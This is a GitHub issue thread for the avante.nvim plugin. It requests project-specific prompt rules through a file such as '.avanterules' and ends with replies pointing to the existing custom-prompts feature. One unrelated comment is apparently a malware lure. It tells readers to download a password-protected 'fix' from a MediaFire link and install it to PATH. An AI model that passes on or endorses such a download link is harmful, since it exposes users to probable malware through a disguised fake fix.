### ISSUE TITLE
Feature Request: Support for project-specific customization

### ISSUE THREAD

**Issue by nathasm** [yetone/avante.nvim#254]
As a user, I would want the ability to further refine the prompt that is sent to the LLM.

I think it makes sense to support the reading of a project-specific file (e.g. `.avanterules`) which would contain any additional rules/customization (e.g. Using this as inspiration - https://docs.cursor.com/context/rules-for-ai#cursorrules)

**Comment by yetone** [comment]
Good point, thanks for the advice!

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bigzhu** [comment]
+1, I urgently need this feature too.

**Comment by aarnphm** [comment]
PSA   https://github.com/yetone/avante.nvim#custom-prompts
